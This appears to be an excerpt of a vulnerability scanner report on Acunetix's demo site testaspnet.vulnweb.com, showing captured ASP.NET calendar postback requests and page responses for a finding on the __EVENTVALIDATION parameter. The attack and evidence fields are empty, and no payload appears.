Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1171 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,171 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8351&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAktdAxNoIZGRk%2FqbaspsHCJ5yWwYNWzKlHXfgOk8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2F%2FZCSDQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAyM8BidaxrSktkqItLpnjfhAbWe2
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:35 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAktdAxNoIZGRk/qbaspsHCJ5yWwYNWzKlHXfgOk8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL//ZCSDQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAyM8BidaxrSktkqItLpnjfhAbWe2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:White" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1073 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,073 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8378&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMC5UHjZ2ghkZGSbqr%2BrHnM%2BusEF01uz54E%2BiUXG9w%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL%2Fu%2BmjDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBCKwkzMjnj%2FgN%2BFjgUaxVlVV5aPY
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:04 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMC5UHjZ2ghkZGSbqr+rHnM+usEF01uz54E+iUXG9w==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL/u+mjDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBCKwkzMjnj/gN+FjgUaxVlVV5aPY" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:White" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
